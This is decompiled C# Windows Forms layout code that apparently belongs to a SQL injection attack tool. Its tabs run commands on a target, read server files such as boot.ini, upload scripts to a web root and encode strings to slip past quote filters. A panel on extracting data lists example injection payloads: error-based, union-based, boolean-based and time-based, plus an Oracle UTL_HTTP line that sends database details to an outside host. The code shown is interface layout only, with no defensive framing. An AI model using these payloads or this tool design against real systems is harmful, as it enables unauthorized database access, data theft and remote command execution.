			((ToolStripItem)toolStripLabel5).set_Text("To");
			((ToolStripItem)txtRowsEnd).set_Name("txtRowsEnd");
			((ToolStripItem)txtRowsEnd).set_Size(new Size(35, 25));
			((ToolStripItem)txtRowsEnd).set_Text("2");
			((ToolStripItem)txtRowsEnd).set_ToolTipText("Rows End( >=1)");
			((ToolStripItem)toolStripSeparator7).set_Name("toolStripSeparator7");
			((ToolStripItem)toolStripSeparator7).set_Size(new Size(6, 25));
			((ToolStripItem)btnGetData).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnGetData).set_Image((Image)((ResourceManager)(object)val).GetObject("btnGetData.Image"));
			((ToolStripItem)btnGetData).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnGetData).set_Name("btnGetData");
			((ToolStripItem)btnGetData).set_Size(new Size(39, 22));
			((ToolStripItem)btnGetData).set_Text("Data");
			((ToolStripItem)btnGetData).add_Click((EventHandler)btnGetData_Click);
			((ToolStripItem)toolStripSeparator9).set_Name("toolStripSeparator9");
			((ToolStripItem)toolStripSeparator9).set_Size(new Size(6, 25));
			((ToolStripItem)btnExpData).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnExpData).set_Image((Image)((ResourceManager)(object)val).GetObject("btnExpData.Image"));
			((ToolStripItem)btnExpData).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnExpData).set_Name("btnExpData");
			((ToolStripItem)btnExpData).set_Size(new Size(50, 22));
			((ToolStripItem)btnExpData).set_Text("Export");
			((ToolStripItem)btnExpData).add_Click((EventHandler)btnExpData_Click);
			((ToolStripItem)toolStripSeparator18).set_Name("toolStripSeparator18");
			((ToolStripItem)toolStripSeparator18).set_Size(new Size(6, 25));
			((Control)tabCMD).get_Controls().Add((Control)(object)listBoxCMD);
			((Control)tabCMD).get_Controls().Add((Control)(object)toolStripDBCMD);
			((Control)tabCMD).get_Controls().Add((Control)(object)toolStripCommand);
			tabCMD.set_ImageKey("cmd.png");
			tabCMD.set_Location(new Point(4, 23));
			((Control)tabCMD).set_Name("tabCMD");
			((Control)tabCMD).set_Size(new Size(677, 418));
			tabCMD.set_TabIndex(2);
			((Control)tabCMD).set_Text("Command");
			tabCMD.set_UseVisualStyleBackColor(true);
			((Control)listBoxCMD).set_Dock((DockStyle)5);
			((ListControl)listBoxCMD).set_FormattingEnabled(true);
			listBoxCMD.set_ItemHeight(12);
			((Control)listBoxCMD).set_Location(new Point(0, 25));
			((Control)listBoxCMD).set_Name("listBoxCMD");
			((Control)listBoxCMD).set_Size(new Size(677, 368));
			((Control)listBoxCMD).set_TabIndex(8);
			toolStripDBCMD.set_BackColor(SystemColors.get_ButtonFace());
			((Control)toolStripDBCMD).set_Dock((DockStyle)2);
			toolStripDBCMD.set_GripStyle((ToolStripGripStyle)0);
			toolStripDBCMD.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[4]
			{
				(ToolStripItem)toolStripSeparator15,
				(ToolStripItem)txtDBCMD,
				(ToolStripItem)btnDBCMD,
				(ToolStripItem)toolStripSeparator16
			});
			((Control)toolStripDBCMD).set_Location(new Point(0, 393));
			((Control)toolStripDBCMD).set_Name("toolStripDBCMD");
			((Control)toolStripDBCMD).set_Size(new Size(677, 25));
			((Control)toolStripDBCMD).set_TabIndex(7);
			((Control)toolStripDBCMD).set_Text("toolStrip1");
			((ToolStripItem)toolStripSeparator15).set_Name("toolStripSeparator15");
			((ToolStripItem)toolStripSeparator15).set_Size(new Size(6, 25));
			((ToolStripItem)txtDBCMD).set_Name("txtDBCMD");
			((ToolStripItem)txtDBCMD).set_Size(new Size(450, 25));
			((ToolStripItem)txtDBCMD).set_Text("select * from master..sysdatabases");
			((ToolStripItem)btnDBCMD).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnDBCMD).set_Image((Image)((ResourceManager)(object)val).GetObject("btnDBCMD.Image"));
			((ToolStripItem)btnDBCMD).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnDBCMD).set_Name("btnDBCMD");
			((ToolStripItem)btnDBCMD).set_Size(new Size(62, 22));
			((ToolStripItem)btnDBCMD).set_Text("DB CMD");
			((ToolStripItem)btnDBCMD).add_Click((EventHandler)btnDBCMD_Click);
			((ToolStripItem)toolStripSeparator16).set_Name("toolStripSeparator16");
			((ToolStripItem)toolStripSeparator16).set_Size(new Size(6, 25));
			toolStripCommand.set_BackColor(SystemColors.get_ButtonFace());
			toolStripCommand.set_GripStyle((ToolStripGripStyle)0);
			toolStripCommand.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[4]
			{
				(ToolStripItem)toolStripSeparator13,
				(ToolStripItem)txtCMD,
				(ToolStripItem)btnCMD,
				(ToolStripItem)toolStripSeparator14
			});
			((Control)toolStripCommand).set_Location(new Point(0, 0));
			((Control)toolStripCommand).set_Name("toolStripCommand");
			((Control)toolStripCommand).set_Size(new Size(677, 25));
			((Control)toolStripCommand).set_TabIndex(6);
			((Control)toolStripCommand).set_Text("toolStrip1");
			((ToolStripItem)toolStripSeparator13).set_Name("toolStripSeparator13");
			((ToolStripItem)toolStripSeparator13).set_Size(new Size(6, 25));
			((ToolStripItem)txtCMD).set_Name("txtCMD");
			((ToolStripItem)txtCMD).set_Size(new Size(450, 25));
			((ToolStripItem)txtCMD).set_Text("dir c:\\");
			((ToolStripItem)btnCMD).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnCMD).set_Image((Image)((ResourceManager)(object)val).GetObject("btnCMD.Image"));
			((ToolStripItem)btnCMD).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnCMD).set_Name("btnCMD");
			((ToolStripItem)btnCMD).set_Size(new Size(56, 22));
			((ToolStripItem)btnCMD).set_Text("Execute");
			((ToolStripItem)btnCMD).add_Click((EventHandler)btnCMD_Click);
			((ToolStripItem)toolStripSeparator14).set_Name("toolStripSeparator14");
			((ToolStripItem)toolStripSeparator14).set_Size(new Size(6, 25));
			((Control)tabFileReader).get_Controls().Add((Control)(object)txtFileContent);
			((Control)tabFileReader).get_Controls().Add((Control)(object)toolFileReader);
			tabFileReader.set_ImageKey("file.png");
			tabFileReader.set_Location(new Point(4, 23));
			((Control)tabFileReader).set_Name("tabFileReader");
			((Control)tabFileReader).set_Size(new Size(677, 418));
			tabFileReader.set_TabIndex(3);
			((Control)tabFileReader).set_Text("FileReader");
			tabFileReader.set_UseVisualStyleBackColor(true);
			((Control)txtFileContent).set_Dock((DockStyle)5);
			((Control)txtFileContent).set_Location(new Point(0, 25));
			((TextBoxBase)txtFileContent).set_Multiline(true);
			((Control)txtFileContent).set_Name("txtFileContent");
			txtFileContent.set_ScrollBars((ScrollBars)3);
			((Control)txtFileContent).set_Size(new Size(677, 393));
			((Control)txtFileContent).set_TabIndex(4);
			toolFileReader.set_BackColor(SystemColors.get_ButtonFace());
			toolFileReader.set_GripStyle((ToolStripGripStyle)0);
			toolFileReader.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[4]
			{
				(ToolStripItem)toolStripLabel6,
				(ToolStripItem)txtFileName,
				(ToolStripItem)btnReadFile,
				(ToolStripItem)toolStripSeparator10
			});
			((Control)toolFileReader).set_Location(new Point(0, 0));
			((Control)toolFileReader).set_Name("toolFileReader");
			((Control)toolFileReader).set_Size(new Size(677, 25));
			((Control)toolFileReader).set_TabIndex(0);
			((Control)toolFileReader).set_Text("ReadFile");
			((ToolStripItem)toolStripLabel6).set_Name("toolStripLabel6");
			((ToolStripItem)toolStripLabel6).set_Size(new Size(114, 22));
			((ToolStripItem)toolStripLabel6).set_Text("FilePath/FileName:");
			((ToolStripItem)txtFileName).set_Name("txtFileName");
			((ToolStripItem)txtFileName).set_Size(new Size(280, 25));
			((ToolStripItem)txtFileName).set_Text("C:/boot.ini");
			((ToolStripItem)btnReadFile).set_DisplayStyle((ToolStripItemDisplayStyle)1);
			((ToolStripItem)btnReadFile).set_Image((Image)((ResourceManager)(object)val).GetObject("btnReadFile.Image"));
			((ToolStripItem)btnReadFile).set_ImageTransparentColor(Color.get_Magenta());
			((ToolStripItem)btnReadFile).set_Name("btnReadFile");
			((ToolStripItem)btnReadFile).set_Size(new Size(61, 22));
			((ToolStripItem)btnReadFile).set_Text("ReadFile");
			((ToolStripItem)btnReadFile).add_Click((EventHandler)btnReadFile_Click);
			((ToolStripItem)toolStripSeparator10).set_Name("toolStripSeparator10");
			((ToolStripItem)toolStripSeparator10).set_Size(new Size(6, 25));
			((Control)tabFileUploader).get_Controls().Add((Control)(object)btnGetWebRoot);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)label3);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)txtTargetFileName);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)label2);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)btnSelectFile);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)btnFileUpload);
			((Control)tabFileUploader).get_Controls().Add((Control)(object)txtUploadFile);
			tabFileUploader.set_ImageKey("upload.png");
			tabFileUploader.set_Location(new Point(4, 23));
			((Control)tabFileUploader).set_Name("tabFileUploader");
			((Control)tabFileUploader).set_Size(new Size(677, 418));
			tabFileUploader.set_TabIndex(5);
			((Control)tabFileUploader).set_Text("FileUploader");
			tabFileUploader.set_UseVisualStyleBackColor(true);
			((Control)btnGetWebRoot).set_Location(new Point(477, 72));
			((Control)btnGetWebRoot).set_Name("btnGetWebRoot");
			((Control)btnGetWebRoot).set_Size(new Size(91, 23));
			((Control)btnGetWebRoot).set_TabIndex(6);
			((Control)btnGetWebRoot).set_Text("Get Web Root");
			((ButtonBase)btnGetWebRoot).set_UseVisualStyleBackColor(true);
			((Control)btnGetWebRoot).add_Click((EventHandler)btnGetWebRoot_Click);
			((Control)label3).set_AutoSize(true);
			((Control)label3).set_Location(new Point(10, 78));
			((Control)label3).set_Name("label3");
			((Control)label3).set_Size(new Size(107, 12));
			((Control)label3).set_TabIndex(5);
			((Control)label3).set_Text("Target Path Name:");
			((Control)txtTargetFileName).set_Location(new Point(121, 73));
			((Control)txtTargetFileName).set_Name("txtTargetFileName");
			((Control)txtTargetFileName).set_Size(new Size(349, 21));
			((Control)txtTargetFileName).set_TabIndex(4);
			((Control)label2).set_AutoSize(true);
			((Control)label2).set_Location(new Point(8, 40));
			((Control)label2).set_Name("label2");
			((Control)label2).set_Size(new Size(107, 12));
			((Control)label2).set_TabIndex(3);
			((Control)label2).set_Text("Text/Script File:");
			((Control)btnSelectFile).set_Location(new Point(476, 35));
			((Control)btnSelectFile).set_Name("btnSelectFile");
			((Control)btnSelectFile).set_Size(new Size(92, 23));
			((Control)btnSelectFile).set_TabIndex(2);
			((Control)btnSelectFile).set_Text("...");
			((ButtonBase)btnSelectFile).set_UseVisualStyleBackColor(true);
			((Control)btnSelectFile).add_Click((EventHandler)btnSelectFile_Click);
			((Control)btnFileUpload).set_Location(new Point(8, 114));
			((Control)btnFileUpload).set_Name("btnFileUpload");
			((Control)btnFileUpload).set_Size(new Size(75, 23));
			((Control)btnFileUpload).set_TabIndex(1);
			((Control)btnFileUpload).set_Text("Upload");
			((ButtonBase)btnFileUpload).set_UseVisualStyleBackColor(true);
			((Control)btnFileUpload).add_Click((EventHandler)btnFileUpload_Click);
			((Control)txtUploadFile).set_Location(new Point(121, 36));
			((Control)txtUploadFile).set_Name("txtUploadFile");
			((Control)txtUploadFile).set_Size(new Size(349, 21));
			((Control)txtUploadFile).set_TabIndex(0);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)btnDecode);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)label17);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)label16);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)btnEncode);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)txtEscapeString);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)txtSourceString);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)label6);
			((Control)tabEscapeString).get_Controls().Add((Control)(object)label5);
			tabEscapeString.set_ImageKey("escape.png");
			tabEscapeString.set_Location(new Point(4, 23));
			((Control)tabEscapeString).set_Name("tabEscapeString");
			((Control)tabEscapeString).set_Size(new Size(677, 418));
			tabEscapeString.set_TabIndex(6);
			((Control)tabEscapeString).set_Text("StringEncode");
			tabEscapeString.set_UseVisualStyleBackColor(true);
			((Control)btnDecode).set_Location(new Point(546, 133));
			((Control)btnDecode).set_Name("btnDecode");
			((Control)btnDecode).set_Size(new Size(75, 23));
			((Control)btnDecode).set_TabIndex(7);
			((Control)btnDecode).set_Text("Decode");
			((ButtonBase)btnDecode).set_UseVisualStyleBackColor(true);
			((Control)btnDecode).add_Click((EventHandler)btnDecode_Click);
			((Control)label17).set_AutoSize(true);
			((Control)label17).set_Location(new Point(112, 102));
			((Control)label17).set_Name("label17");
			((Control)label17).set_Size(new Size(359, 12));
			((Control)label17).set_TabIndex(6);
			((Control)label17).set_Text("Escape single/double quotes filter, used for SQL Injection.");
			((Control)label16).set_AutoSize(true);
			((Control)label16).set_Location(new Point(112, 45));
			((Control)label16).set_Name("label16");
			((Control)label16).set_Size(new Size(353, 12));
			((Control)label16).set_TabIndex(5);
			((Control)label16).set_Text("Don't input the beginning and the end special char: ' or \"");
			((Control)btnEncode).set_Location(new Point(114, 133));
			((Control)btnEncode).set_Name("btnEncode");
			((Control)btnEncode).set_Size(new Size(75, 23));
			((Control)btnEncode).set_TabIndex(4);
			((Control)btnEncode).set_Text("Encode");
			((ButtonBase)btnEncode).set_UseVisualStyleBackColor(true);
			((Control)btnEncode).add_Click((EventHandler)btnEncode_Click);
			((Control)txtEscapeString).set_Location(new Point(114, 78));
			((Control)txtEscapeString).set_Name("txtEscapeString");
			((Control)txtEscapeString).set_Size(new Size(507, 21));
			((Control)txtEscapeString).set_TabIndex(3);
			((Control)txtSourceString).set_Location(new Point(114, 21));
			((Control)txtSourceString).set_Name("txtSourceString");
			((Control)txtSourceString).set_Size(new Size(507, 21));
			((Control)txtSourceString).set_TabIndex(2);
			((Control)label6).set_AutoSize(true);
			((Control)label6).set_Location(new Point(18, 82));
			((Control)label6).set_Name("label6");
			((Control)label6).set_Size(new Size(89, 12));
			((Control)label6).set_TabIndex(1);
			((Control)label6).set_Text("String Encode:");
			((Control)label5).set_AutoSize(true);
			((Control)label5).set_Location(new Point(18, 25));
			((Control)label5).set_Name("label5");
			((Control)label5).set_Size(new Size(89, 12));
			((Control)label5).set_TabIndex(0);
			((Control)label5).set_Text("Source String:");
			((Control)tabDebug).get_Controls().Add((Control)(object)grpInjectMethod);
			tabDebug.set_ImageKey("tool.png");
			tabDebug.set_Location(new Point(4, 23));
			((Control)tabDebug).set_Name("tabDebug");
			((Control)tabDebug).set_Size(new Size(677, 418));
			tabDebug.set_TabIndex(4);
			((Control)tabDebug).set_Text("Debug");
			tabDebug.set_UseVisualStyleBackColor(true);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label23);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)radioTime);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label20);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label21);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label22);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)ComboBoxWebEncoding);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label19);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)ComboBoxDBEncoding);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label18);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)txtComment);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)lblComment);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label4);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label1);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)radioCrossSite);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label15);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label14);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label13);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label12);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label11);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label10);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)txtWildField);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label9);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)btnSetEnv);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)btnGetEnv);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label8);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)txtInjectField);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)label7);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)txtFieldNum);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)radioBlind);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)radioFieldEcho);
			((Control)grpInjectMethod).get_Controls().Add((Control)(object)radioPlainText);
			((Control)grpInjectMethod).set_Location(new Point(3, 13));
			((Control)grpInjectMethod).set_Name("grpInjectMethod");
			((Control)grpInjectMethod).set_Size(new Size(661, 397));
			((Control)grpInjectMethod).set_TabIndex(1);
			grpInjectMethod.set_TabStop(false);
			((Control)grpInjectMethod).set_Text("How to Get Data When SQL Injection (For Professional)");
			((Control)label23).set_AutoSize(true);
			((Control)label23).set_Location(new Point(145, 237));
			((Control)label23).set_Name("label23");
			((Control)label23).set_Size(new Size(329, 12));
			((Control)label23).set_TabIndex(31);
			((Control)label23).set_Text("Example: http://127.0.0.1/topic.php?id=10 and sleep(3)");
			((Control)radioTime).set_AutoSize(true);
			((Control)radioTime).set_Location(new Point(10, 234));
			((Control)radioTime).set_Name("radioTime");
			((Control)radioTime).set_Size(new Size(83, 16));
			((Control)radioTime).set_TabIndex(30);
			radioTime.set_TabStop(true);
			((Control)radioTime).set_Text("Time-Based");
			((ButtonBase)radioTime).set_UseVisualStyleBackColor(true);
			((Control)label20).set_AutoSize(true);
			((Control)label20).set_Location(new Point(239, 333));
			((Control)label20).set_Name("label20");
			((Control)label20).set_Size(new Size(389, 12));
			((Control)label20).set_TabIndex(29);
			((Control)label20).set_Text("Example: UTF-8  UTF-16(Unicode)  iso-8859-1(Latin1)  gb2312 big5");
			((Control)label21).set_AutoSize(true);
			((Control)label21).set_Location(new Point(239, 307));
			((Control)label21).set_Name("label21");
			((Control)label21).set_Size(new Size(389, 12));
			((Control)label21).set_TabIndex(28);
			((Control)label21).set_Text("Example: UTF-8  UTF-16(Unicode)  iso-8859-1(Latin1)  gb2312 big5");
			((Control)label22).set_AutoSize(true);
			((Control)label22).set_Location(new Point(19, 307));
			((Control)label22).set_Name("label22");
			((Control)label22).set_Size(new Size(83, 12));
			((Control)label22).set_TabIndex(27);
			((Control)label22).set_Text("Web Encoding:");
			((ListControl)ComboBoxWebEncoding).set_FormattingEnabled(true);
			ComboBoxWebEncoding.get_Items().AddRange(new object[5]
			{
				"UTF-8",
				"UTF-16",
				"iso-8859-1",
				"gb2312",
				"big5"
			});
			((Control)ComboBoxWebEncoding).set_Location(new Point(132, 303));
			((Control)ComboBoxWebEncoding).set_Name("ComboBoxWebEncoding");
			((Control)ComboBoxWebEncoding).set_Size(new Size(95, 20));
			((Control)ComboBoxWebEncoding).set_TabIndex(26);
			((Control)label19).set_AutoSize(true);
			((Control)label19).set_Location(new Point(19, 333));
			((Control)label19).set_Name("label19");
			((Control)label19).set_Size(new Size(113, 12));
			((Control)label19).set_TabIndex(24);
			((Control)label19).set_Text("Database Encoding:");
			((ListControl)ComboBoxDBEncoding).set_FormattingEnabled(true);
			ComboBoxDBEncoding.get_Items().AddRange(new object[5]
			{
				"UTF-8",
				"UTF-16",
				"iso-8859-1",
				"gb2312",
				"big5"
			});
			((Control)ComboBoxDBEncoding).set_Location(new Point(132, 329));
			((Control)ComboBoxDBEncoding).set_Name("ComboBoxDBEncoding");
			((Control)ComboBoxDBEncoding).set_Size(new Size(95, 20));
			((Control)ComboBoxDBEncoding).set_TabIndex(23);
			((Control)label18).set_AutoSize(true);
			((Control)label18).set_Location(new Point(239, 281));
			((Control)label18).set_Name("label18");
			((Control)label18).set_Size(new Size(245, 12));
			((Control)label18).set_TabIndex(22);
			((Control)label18).set_Text("Example: --%20  %23  +--+   /*  %00  ;--");
			((Control)txtComment).set_Location(new Point(132, 277));
			((Control)txtComment).set_Name("txtComment");
			((Control)txtComment).set_Size(new Size(95, 21));
			((Control)txtComment).set_TabIndex(21);
			((Control)lblComment).set_AutoSize(true);
			((Control)lblComment).set_Location(new Point(19, 281));
			((Control)lblComment).set_Name("lblComment");
			((Control)lblComment).set_Size(new Size(101, 12));
			((Control)lblComment).set_TabIndex(20);
			((Control)lblComment).set_Text("Comments String:");
			((Control)label4).set_AutoSize(true);
			((Control)label4).set_Location(new Point(145, 213));
			((Control)label4).set_Name("label4");
			((Control)label4).set_Size(new Size(509, 12));
			((Control)label4).set_TabIndex(19);
			((Control)label4).set_Text("'http://vulnweb.janusec.com/info.php?id='||(select instance_name from v$instance))--");
			((Control)label1).set_AutoSize(true);
			((Control)label1).set_Location(new Point(145, 194));
			((Control)label1).set_Name("label1");
			((Control)label1).set_Size(new Size(395, 12));
			((Control)label1).set_TabIndex(18);
			((Control)label1).set_Text("Example: http://127.0.0.1/topic.jsp?id=1 and 1=(UTL_HTTP.request(");
			((Control)radioCrossSite).set_AutoSize(true);
			((Control)radioCrossSite).set_Location(new Point(10, 192));
			((Control)radioCrossSite).set_Name("radioCrossSite");
			((Control)radioCrossSite).set_Size(new Size(113, 16));
			((Control)radioCrossSite).set_TabIndex(17);
			radioCrossSite.set_TabStop(true);
			((Control)radioCrossSite).set_Text("CrossSite-Based");
			((ButtonBase)radioCrossSite).set_UseVisualStyleBackColor(true);
			((Control)label15).set_AutoSize(true);
			((Control)label15).set_Location(new Point(287, 101));
			((Control)label15).set_Name("label15");
			((Control)label15).set_Size(new Size(65, 12));
			((Control)label15).set_TabIndex(16);
			((Control)label15).set_Text("Example: 4");
			((Control)label14).set_AutoSize(true);
			((Control)label14).set_Location(new Point(287, 71));
			((Control)label14).set_Name("label14");
			((Control)label14).set_Size(new Size(65, 12));
			((Control)label14).set_TabIndex(15);
			((Control)label14).set_Text("Example: 3");
			((Control)label13).set_AutoSize(true);
			((Control)label13).set_Location(new Point(145, 158));
			((Control)label13).set_Name("label13");
			((Control)label13).set_Size(new Size(467, 12));
			((Control)label13).set_TabIndex(14);
			((Control)label13).set_Text("Example: http://127.0.0.1/topic.asp?id=10 and ascii(substr(@@version,1,1))<97");
			((Control)label12).set_AutoSize(true);
			((Control)label12).set_Location(new Point(145, 49));
			((Control)label12).set_Name("label12");
			((Control)label12).set_Size(new Size(497, 12));
			((Control)label12).set_TabIndex(13);
			((Control)label12).set_Text("Example: http://127.0.0.1/topic.asp?id=10 and 1=2 union all select 1,1,@@version,1");
			((Control)label11).set_AutoSize(true);
			((Control)label11).set_Location(new Point(145, 27));
			((Control)label11).set_Name("label11");
			((Control)label11).set_Size(new Size(347, 12));
			((Control)label11).set_TabIndex(12);
			((Control)label11).set_Text("Example: http://127.0.0.1/topic.asp?id=10 and 1=@@version");
			((Control)label10).set_AutoSize(true);
			((Control)label10).set_Location(new Point(287, 129));
			((Control)label10).set_Name("label10");
			((Control)label10).set_Size(new Size(305, 12));
			((Control)label10).set_TabIndex(11);
			((Control)label10).set_Text("Example: 1  (One of: 1/NULL/char(97)/chr(97) etc.)");
			((Control)txtWildField).set_Location(new Point(185, 126));
			((Control)txtWildField).set_Name("txtWildField");
			((Control)txtWildField).set_Size(new Size(90, 21));
			((Control)txtWildField).set_TabIndex(10);
			((Control)label9).set_AutoSize(true);
			((Control)label9).set_Location(new Point(43, 129));
			((Control)label9).set_Name("label9");
			((Control)label9).set_Size(new Size(137, 12));
			((Control)label9).set_TabIndex(9);
			((Control)label9).set_Text("Other Field Filled By:");
			((Control)btnSetEnv).set_Enabled(false);
			((Control)btnSetEnv).set_Location(new Point(185, 361));
			((Control)btnSetEnv).set_Name("btnSetEnv");
			((Control)btnSetEnv).set_Size(new Size(107, 23));
			((Control)btnSetEnv).set_TabIndex(8);
			((Control)btnSetEnv).set_Text("SetCurrentValue");
			((ButtonBase)btnSetEnv).set_UseVisualStyleBackColor(true);
			((Control)btnSetEnv).add_Click((EventHandler)btnSetEnv_Click);
			((Control)btnGetEnv).set_Location(new Point(22, 361));
			((Control)btnGetEnv).set_Name("btnGetEnv");
			((Control)btnGetEnv).set_Size(new Size(110, 23));
			((Control)btnGetEnv).set_TabIndex(7);
			((Control)btnGetEnv).set_Text("GetCurrentValue");
			((ButtonBase)btnGetEnv).set_UseVisualStyleBackColor(true);
			((Control)btnGetEnv).add_Click((EventHandler)btnGetEnv_Click);
			((Control)label8).set_AutoSize(true);
			((Control)label8).set_Location(new Point(43, 71));
			((Control)label8).set_Name("label8");
			((Control)label8).set_Size(new Size(131, 12));
			((Control)label8).set_TabIndex(6);
			((Control)label8).set_Text("Inject In Field(1-N):");
			((Control)txtInjectField).set_Location(new Point(185, 68));
			((Control)txtInjectField).set_Name("txtInjectField");
			((Control)txtInjectField).set_Size(new Size(90, 21));
			((Control)txtInjectField).set_TabIndex(5);
			((Control)label7).set_AutoSize(true);
			((Control)label7).set_Location(new Point(43, 101));
			((Control)label7).set_Name("label7");
			((Control)label7).set_Size(new Size(125, 12));
			((Control)label7).set_TabIndex(4);
			((Control)label7).set_Text("Field Number In SQL:");
			((Control)txtFieldNum).set_Location(new Point(185, 98));
			((Control)txtFieldNum).set_Name("txtFieldNum");
			((Control)txtFieldNum).set_Size(new Size(90, 21));
			((Control)txtFieldNum).set_TabIndex(3);
			((Control)radioBlind).set_AutoSize(true);
			((Control)radioBlind).set_Location(new Point(10, 156));
			((Control)radioBlind).set_Name("radioBlind");
			((Control)radioBlind).set_Size(new Size(101, 16));
			((Control)radioBlind).set_TabIndex(2);
			radioBlind.set_TabStop(true);
			((Control)radioBlind).set_Text("Boolean-Based");
			((ButtonBase)radioBlind).set_UseVisualStyleBackColor(true);
			((Control)radioFieldEcho).set_AutoSize(true);
			((Control)radioFieldEcho).set_Location(new Point(10, 47));
			((Control)radioFieldEcho).set_Name("radioFieldEcho");
			((Control)radioFieldEcho).set_Size(new Size(89, 16));
			((Control)radioFieldEcho).set_TabIndex(1);
			radioFieldEcho.set_TabStop(true);
			((Control)radioFieldEcho).set_Text("Union-Based");
			((ButtonBase)radioFieldEcho).set_UseVisualStyleBackColor(true);
			((Control)radioPlainText).set_AutoSize(true);
			((Control)radioPlainText).set_Location(new Point(10, 25));
			((Control)radioPlainText).set_Name("radioPlainText");
			((Control)radioPlainText).set_Size(new Size(89, 16));
			((Control)radioPlainText).set_TabIndex(0);
			radioPlainText.set_TabStop(true);
			((Control)radioPlainText).set_Text("Error-Based");
			((ButtonBase)radioPlainText).set_UseVisualStyleBackColor(true);
			toolStripSQL.set_BackColor(SystemColors.get_ButtonFace());
			toolStripSQL.set_GripStyle((ToolStripGripStyle)0);
			toolStripSQL.get_Items().AddRange((ToolStripItem[])(object)new ToolStripItem[11]
			{
				(ToolStripItem)toolStripLabel1,
				(ToolStripItem)cmbDBTypeList,
				(ToolStripItem)toolStripSeparator1,
				(ToolStripItem)toolStripLabel2,
				(ToolStripItem)txtKeyWord,
				(ToolStripItem)toolStripSeparator2,
				(ToolStripItem)toolStripLabel3,
				(ToolStripItem)cmbParameterType,
				(ToolStripItem)toolStripSeparator3,
				(ToolStripItem)ButtonResetSQL,
				(ToolStripItem)toolStripSeparator20
			});
			((Control)toolStripSQL).set_Location(new Point(0, 0));
			((Control)toolStripSQL).set_Name("toolStripSQL");
			((Control)toolStripSQL).set_Size(new Size(685, 25));
			((Control)toolStripSQL).set_TabIndex(1);
			((Control)toolStripSQL).set_Text("SQL Injection");
			((ToolStripItem)toolStripLabel1).set_Name("toolStripLabel1");
			((ToolStripItem)toolStripLabel1).set_Size(new Size(66, 22));
			((ToolStripItem)toolStripLabel1).set_Text("DataBase:");
			cmbDBTypeList.set_DropDownStyle((ComboBoxStyle)2);
			cmbDBTypeList.get_Items().AddRange(new object[9]
			{
				"UnKnown",
				"SQLServer",
				"MySQL",
				"Oracle",
				"DB2",
				"Access",
				"PostgreSQL",
				"SQLite",
				"Other"
			});
			((ToolStripItem)cmbDBTypeList).set_Name("cmbDBTypeList");
			((ToolStripItem)cmbDBTypeList).set_Size(new Size(80, 25));
			cmbDBTypeList.add_DropDownClosed((EventHandler)cmbDBTypeList_DropDownClosed);
			((ToolStripItem)toolStripSeparator1).set_Name("toolStripSeparator1");
			((ToolStripItem)toolStripSeparator1).set_Size(new Size(6, 25));
			((ToolStripItem)toolStripLabel2).set_Name("toolStripLabel2");
			((ToolStripItem)toolStripLabel2).set_Size(new Size(65, 22));
			((ToolStripItem)toolStripLabel2).set_Text("KeyWord:");
			((ToolStripItem)txtKeyWord).set_Name("txtKeyWord");
			((ToolStripItem)txtKeyWord).set_Size(new Size(150, 25));
			((ToolStripItem)toolStripSeparator2).set_Name("toolStripSeparator2");
			((ToolStripItem)toolStripSeparator2).set_Size(new Size(6, 25));
			((ToolStripItem)toolStripLabel3).set_Name("toolStripLabel3");
			((ToolStripItem)toolStripLabel3).set_Size(new Size(103, 22));
			((ToolStripItem)toolStripLabel3).set_Text("Parameter Type:");
			cmbParameterType.set_DropDownStyle((ComboBoxStyle)2);
			cmbParameterType.get_Items().AddRange(new object[4]
			{
				"UnKnown",
				"Integer",
				"String",
				"Search"
			});
			((ToolStripItem)cmbParameterType).set_Name("cmbParameterType");
